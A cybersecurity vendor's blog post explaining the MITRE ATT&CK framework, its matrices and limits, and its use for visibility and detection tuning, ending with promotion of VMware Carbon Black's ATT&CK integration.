OUR BLOG

Is our information system protected?




That is the final question of many meetings on cybersecurity. The first thing that comes to your mind is: What do you mean by protected? What does “good” mean to an analyst, SOC manager, or CISO? The executive often only wants YES or NO. How to answer to this question simply and not explaining for one hour?

 

The same or similar question one could ask you for new cybersecurity solutions that you were planning on getting for your company. Independent companies are testing and comparing different results of solutions, but they are focusing only on certain types of attacks (exploits, malware...). After purchase of new system, will you be able to answer the question: are we protected?

 

Many are turning to MITRE ATT&CK™ to better understand threats in their unique environments to know how “good” their existing security infrastructure may be.

https://attack.mitre.org/matrices/enterprise/

 

What is MITRE ATT&CK™ framework?

 

SKY EXPRESS MITRE company has started ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) project in 2013 in order to document usual tactics, technics and procedures (TTP) wich are used in attacks on Windows OS. It was created out of a need for documenting cyber attacker’s behaviour, foru sage in research MITRE project called FMX. It is based on research and opservation of cyber attacks and it help by providing simple language to describe technices that attackers use.

 

Simply, ATT&CK could be presented by charts consisted of tactics and techniques. Tactics are reffered to ’’why’’, what is the reason why attackers attack. E.g. attacker wants to access credentials.

Technics are refferd to ’’how’’ attacker achieves his goal.

Subtechniques reffer to more detailed description of attackers behaviour, used to achieve the goal. They are added to chart at the beginning od 2020.

They are created as a result of a need that certain technics parse depending of attack type:

Procedures represent a specific implementation of the application of a technique or sub-technique by attackers use. ATT&CK is updateing regulary as new threats and techniques develop. ATT&CK matrices exist for the following security domains:

- Enterprise: Techniques threat actors use to access and operate on Windows, Mac, and Linux systems

- Cloud - Cloud: Tactics and techniques used on cloud platforms,

- Mobile: Techniques used on iOS and Android devices

-  Pre-ATT&CK: Activities threat groups may undertake during targeting, technical development, and attack staging activities

- ICS - ICS: Techniques that may be used in operations targeting industrial control systems

 

The references and explanations provided by MITRE are a big help, but it does take a rather deep well of security knowledge to understand each technique in full detail. Besides references and explanations, every technique and sub technique has its own ID no.

 

Success key when using ATT&CK lies in understunding of ’’what’’ you can get out of it. ATT&CK is not all-powerful. Organizations that treat it as such could end up with a false sense of security and misallocation of resources. Although ATT&CK is, currently available, the most extensive base of hackers attacks, it will not cover all attacks due to limitless nature of cyber security. They should use it as knowledge base and not as a tool for measuring level of a companie’s cyber security.

 

In reality, if a security team were to be alerted every time a technique in ATT&CK was detected on an endpoint or on the network, they would be flooded with alerts every time a user compressed a file or every time an admin ran Powershell on an endpoint. After all, there is significant overlap between attacker techniques, operating system functionality, and normal IT operations. Extensive tuning and detection engineering is needed to get to high confidence, low noise detections. Many techniques should rarely, if ever, alert. They should instead be used as contextual indicators towards higher confidence alerts. Teams need to understand what is right for alerting in their environment. They should understand which ATT&CK matrix cells are more about visibility into techniques to ensure the ability to hunt proactively and further enrich other security alerts.

 

https://attack.mitre.org/groups/

 

Once you understand the challenges and possible missteps one can make in using MITRE ATT&CK, it’s time to start thinking about what to do with it. A key concept when operationalizing ATT&CK is visibility.

 

Visibility is a word we hear commonly in security, and for good reason. You can’t stop an adversary that you don’t know is there. Visibility is about ensuring security teams can see into systems and collecting the right information they need to prevent, detect, and respond to threats. This sounds straightforward in concept, but the practice is much more complicated given the millions or even billions of events happening on endpoints and on the network in a given day. You need to worry about what data to gather, how to gather it, and where to put it.

 

Taking a look at results, teams can start asking questions like: 

- Where are there gaps in my visibility?

- How often does this occur in my environment?

- Can I associate this with a legitimate business process?

- What is the relative normalcy of the associated user or host?

 

ATT&CK can also be a useful tool for security evaluations. It cannot replace a penetration test or a dedicated Red Team, but it can help teams with some quick-and-dirty assessments. Several software projects, including Caldera from MITRE and Atomic Red Team from Red Canary, can generate real data on endpoints corresponding to ATT&CK techniques.

 

Conclusion

 

The cybersecurity world is moving at a rapid pace and adversaries are always coming up with new tactics to achieve their goals. Frameworks like MITRE ATT&CK — while not catch-all guidelines for previously mentioned reasons — are essential to developing stronger cybersecurity programs. With proper consideration and utilization of ATT&CK, security team leaders will be able to provide more insight into the strengths and weaknesses of their security program to ideally be able to respond: “For now.”

 

VMware Carbon Black and MITRE ATT&CK VMware Carbon Black, leading EDR provider, has recognized significance of ATT&CK. As mentioned before, every technique has its ID no. In February 2020, MITRE framework technique IDs were integrated into the Endpoint Standard solution.

For more info visit: https://www.carbonblack.com/blog/mitre-attck-evalution-demonstrates-the-power-of-the-vmware-carbon-black-cloud/

 

Last year MITRE has done evaluation of antivirus and EDR solutions. This evaluation was based on imitation of hackers group attack APT29, nationally sponsored group which was distinguished by its commitment to the invisible and sophisticated implementation of techniques through custom malware.

You can see the results VMware Carbon Black has achieved here: https://attackevals.mitre-engenuity.org/APT29/results/vmware/index.html

 

source: How to use MITRE ATT&CK™, by MARK DUFRESNE Protections Team Lead, Elastic Security


Recent Posts


Cyber Hygiene: Preserve Digital Health
Cybersecurity Based on Artificial Intelligence: A New Frontline of Cyber Defense
Enhance the Security of Your Business with CybSafe!
5 Reasons Why Companies Need Cybersecurity
EDR (Endpoint Detection and Response) - Next-Generation Antivirus Solution
GDPR and Personal Data Protection Law
2023 IT Security Trends
How do you measure cybersecurity in your company?
CISO as a service: why does outsourcing pay off?
Syndemic of cyber crime
Global Incident Response - Threat Report
5 biggest GDPR fines ever
Explosive growth in the number of cyber attacks is destroying the economy
How to protect web applications
TOP 5 Security risks in Web Application
Pandemic continues to pave the way for cyber attacks
Cyber security and insurance
What is the cost of a data breach?
Hackers target
Security of business information systems
Cyber crime in 2021
Target: Covid-19 vaccine
Effective information systems security is one of the key pillars of a successful business
The hacker hook was cast!
Working from home? How to be cyber protected and run your business smoothly
Cyber criminal is causing more damage than bad weather?
Remote Work: A security challenge or an ideal opportunity for hackers
The biggest threats to information security in 2020
3 REASONS WHY YOUR COMPANY SHOULD INVEST IN CYBER SECURITY
WHAT IS THE DIFFERENCE BETWEEN CYBER SECURITY AND INFORMATION SECURITY?


About Us




Sky Express is an exclusive distributor of advanced cybersecurity solutions and services in the field of information security, covering SEE market.


Sky Express offers a very selective range of complemental, compatibile.


Learn more
QUICK LINKS
About us
Why us?
News
Blog
Careers
Office locations
PRODUCTS
VMware Carbon Black
DF Labs
Logpoint
Onapsis
Open Systems
Eperi
Avast
Security Scorecard
Kerio
Panaseer
Sky Express d.o.o.

Work hours:

Monday - Friday

09:00 - 17:00


Terms & Conditions Privacy Policy Cookie Policy
Copyright 2024 Sky Express d.o.o. All right reserved
website developed

CONTACT US

Get In Touch

We look forward to
hearing from you.

CONTACT US

KONTAKT

Kontakt

Rado ćemo odgovoriti na vaša pitanja!

KONTAKTIRAJTE NAS
x
Sky Express koristi kolačiće (cookies) koji služe poboljšanju funkcionalnosti sajta i ne sadrže lične podatke. Više o kolačićima pročitajte u Politici privatnosti.
x
Sky Express uses cookies to improve the functionality of the site and do not contain personal information. Read more about cookies in our Privacy Policy.